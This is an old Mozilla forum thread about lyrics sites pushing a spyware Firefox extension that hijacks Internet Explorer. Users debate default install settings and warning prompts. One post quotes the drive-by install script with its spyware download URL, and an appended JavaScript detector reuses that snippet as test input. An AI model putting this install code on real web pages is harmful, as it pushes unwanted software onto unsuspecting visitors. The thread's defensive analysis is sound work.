We got another XPISpyware

esavior
Posts: 1211
Joined: July 29th, 2003, 1:57 pm

Post by esavior »

http://www.musicsonglyrics.com/T/Thursd ... lyrics.htm

It's there all right. I could only get it to pop up once, but after digging through the source, it's in an external js file.
It grabs the XPI from:
http://www2.flingstone.com/cab/sbc_netscape.xpi
You can find the code in the 4th external script call, the one with all the characters. I would just paste it here but I don't know the legality of pasting their code.
Mindjunk
I didn't hear no bell...
arch
Posts: 85
Joined: May 4th, 2003, 8:58 am

Post by arch »

I poked around xpi a bit. Here's the summary:

The XPI contains sbc_netscape.exe; it installs a program called Bridge, which hijacks IE. Associated somehow with www.blazefind.com.
"No good deed goes ever unpunished"
http://archonon.sytes.net
chapas
Posts: 186
Joined: March 22nd, 2004, 12:37 pm
Location: Buenos Aires, Argentina

Post by chapas »

Oh the irony....an xpi for mozilla to hijack IE. I hope Fx can't be hijacked as easily as IE. And now we have to get serious about what to do with these malicious XPIs T__T
AnonEmoose
Posts: 2031
Joined: February 6th, 2004, 11:59 am

Post by AnonEmoose »

esavior
Posts: 1211
Joined: July 29th, 2003, 1:57 pm

Post by esavior »

Mindjunk
I didn't hear no bell...
logan
Posts: 3453
Joined: May 22nd, 2003, 3:51 pm
Location: NGC 2403

Post by logan »

chapas wrote:Oh the irony....an xpi for mozilla to hijack IE. I hope Fx can't be hijacked as easily as IE. And now we have to get serious about what to do with these malicious XPIs T__T


unless someone blindly changes the xpinstall.* defaults, it's not a problem.
Thesh
Posts: 370
Joined: October 15th, 2003, 12:30 am

Post by Thesh »

logan wrote:unless someone blindly changes the xpinstall.* defaults, it's not a problem.


I disagree, there are people who hit accept for everything. The best solution is to simply disable it by default as per Bug 234068. This does not mean we shouldn't take further measures like having signed controls and making it so you can only install by clicking a link (both current bugs) as well as whitelists and blacklists.
nexx
Posts: 736
Joined: July 29th, 2003, 1:23 am
Location: Brisbane, Australia

Post by nexx »

iirc recent builds don't allow xpi installation unless the user specifically clicks on a link, so they won't pop up when a page loads.
Extensions are a key part of Firefox, and disabling them by default because a few sites may install spyware will probably cause more pain. Users will turn on xpiinstall to install their extensions and leave it on anyway.
Office XP Menus: http://users.bigpond.net.au/nexx1/oxpmenu/ || Unofficial Firefox Branding: http://scragz.com/tech/mozilla/firefox-unofficial-branding.php
esavior
Posts: 1211
Joined: July 29th, 2003, 1:57 pm

Post by esavior »

I actually agree with the disable by default... the people that turn it on and leave it on most likely understand what extensions are... at least enough to know that they need to turn that option on. What I am concerned about is the newb user who, the first time they see that popup, is on a spywared site and won't know what to do; they may just press install. Try to remember that most people won't know what extensions are, or even use them, once Fx starts getting mass deployment; everyone here uses extensions, but we aren't average users.
Mindjunk
I didn't hear no bell...
MonkeeSage
Posts: 1011
Joined: December 20th, 2002, 8:15 pm

Post by MonkeeSage »

I'd like to see a message box like AnonEmoose suggested, something along the lines of...

"This page is attempting to install [software name] on your computer using the Mozilla Installer. Software is potentially dangerous and can cause damage to your computer. In order to minimize the potential risk, you should only install software you have requested, from vendors you trust. If you understand this and wish to continue the installation, press INSTALL. If you do not understand this or did not request the software, press CANCEL."

...with the 'critical' icon on the prompt.


Shelumi`El
Jordan

S.D.G
"[M]en are usually satisfied with bad argument only when their convictions rest on other grounds." --John Oman
wildman
Posts: 222
Joined: June 20th, 2003, 12:20 pm
Location: Florida

Post by wildman »

theshooter wrote:
logan wrote:unless someone blindly changes the xpinstall.* defaults, it's not a problem.


I disagree, there are people who hit accept for everything. The best solution is to simply disable it by default as per Bug 234068. This does not mean we shouldn't take further measures like having signed controls and making it so you can only install by clicking a link (both current bugs) as well as whitelists and blacklists.

Well said & it's worth repeating. We can thank Micro$oft again for some of the bad habits users develop; very few MS drivers are signed by MS, so folks just tend to accept everything despite the warning. Signed Packages with md5sums, Approved Sources (white/black lists), and legitimate Quality Controls on mirrors which scan for virus/spyware/malware infections on the software they distribute. There are several similar threads in these forums. Here is one I wrote to try & summarize the problems with extensions from a sysadmin's point of view...

Extension Manager with AutoUpdate - MozillaZine Forums
http://forums.mozillazine.org/viewtopic.php?t=63373
wildman
Posts: 222
Joined: June 20th, 2003, 12:20 pm
Location: Florida

Post by wildman »

I submitted the following to the devs at SpybotS&D via this link...
SpybotS&D: Contact - Detections
http://www.safer-networking.org/index.p ... detections
Name: wildman, Email address: guess_or_pm_me@pobox.com
Email subject: Mozilla/Firefox XPI apps
Report file: http://www2.flingstone.com/cab/sbc_netscape.xpi

Hope you can find the time to visit the MozillaZine Forums & participate in this discussion...

We got another XPISpyware - MozillaZine Forums - http://forums.mozillazine.org/viewtopic.php?t=66531

...and possibly support/contribute anti-spyware solutions to their project in the form of a SpyBot plugin/extension.

I made a similar comment on a Moz related blog recently, that may interest you.

Robert Accettura: Spyware Blaster Supports Mozilla
http://robert.accettura.com/archives/000347.shtml
esavior
Posts: 1211
Joined: July 29th, 2003, 1:57 pm

Post by esavior »

Just had it pop up at another site, same spyware though
http://www.lyricsdomain.com/2/brand_new/
Mindjunk
I didn't hear no bell...
Kraftwerk
Posts: 106
Joined: April 2nd, 2004, 3:04 pm

Post by Kraftwerk »

nexx wrote:iirc recent builds don't allow xpi installation unless the user specifically clicks on a link, so they won't pop up when a page loads.

I'm using the 20040403 build and it still tries to install.. :/
there's some kind of stupid script trying to do that I guess, it's not in the html itself (I think)..
esavior
Posts: 1211
Joined: July 29th, 2003, 1:57 pm

Post by esavior »

aye it's an external script,

tries
InstallTrigger.install({'Free Access Plugin 1.117' : 'http://www2.flingstone.com/cab/sbc_netscape.xpi'});
and if that fails
location.replace('http://www2.flingstone.com/cab/sbc_netscape.xpi');
}

and I am using the newest build and still it's happening.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7b) Gecko/20040404 Firefox/0.8.0+ (mmoy-O2-GL7-SSE2-crc32-gifalloc)
Mindjunk
I didn't hear no bell...
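
The two-step behaviour quoted in the post above (an InstallTrigger.install call, then a location.replace fallback to the same .xpi), as an added detection sketch that is not part of the original thread: it scans script source for both patterns and flags XPI URLs hosted off the page's own origin. The function name findXpiPushes, the sample script wrapper and the page URL are constructed for illustration.

```javascript
// Added example: flag script text that pushes an XPI at the visitor, either
// via InstallTrigger.install({...}) or by navigating straight to a .xpi URL.
// findXpiPushes and the sample input below are constructed for illustration.
function findXpiPushes(scriptText, pageUrl) {
  const pageHost = new URL(pageUrl).hostname;
  const findings = [];
  const record = (method, label, rawUrl) => {
    let host = null;
    try { host = new URL(rawUrl, pageUrl).hostname; } catch (e) { /* unparsable URL */ }
    findings.push({ method, label, url: rawUrl, host, thirdParty: host !== pageHost });
  };

  // InstallTrigger.install({ 'Display name' : 'url', ... })
  const installCall = /InstallTrigger\s*\.\s*install\s*\(\s*\{([^}]*)\}/g;
  const entry = /(['"])(.*?)\1\s*:\s*(['"])(.*?)\3/g;
  for (const call of scriptText.matchAll(installCall)) {
    for (const e of call[1].matchAll(entry)) record('InstallTrigger.install', e[2], e[4]);
  }

  // Fallback navigation: location.replace('...xpi'), location.assign('...xpi'),
  // location.href = '...xpi' or location = '...xpi'
  const nav = /location\s*(?:\.\s*(replace|assign)\s*\(|\.\s*href\s*=|=)\s*(['"])([^'"]+?\.xpi(?:\?[^'"]*)?)\2/gi;
  for (const n of scriptText.matchAll(nav)) {
    record('location.' + (n[1] || 'href'), null, n[3]);
  }
  return findings;
}

// Constructed sample modelled on the snippet quoted in the thread; the
// try/catch wrapper is an assumption about how the fallback is reached.
const sampleScript = `
try {
  InstallTrigger.install({'Free Access Plugin 1.117' : 'http://www2.flingstone.com/cab/sbc_netscape.xpi'});
} catch (e) {
  location.replace('http://www2.flingstone.com/cab/sbc_netscape.xpi');
}`;

const report = findXpiPushes(sampleScript, 'http://lyrics.example/page.htm');
for (const f of report) {
  console.log(`${f.method} -> ${f.url} (third-party host: ${f.thirdParty})`);
}
```

A hit with thirdParty set to true matches what the thread describes: a lyrics page whose script pulls its installer from an unrelated host.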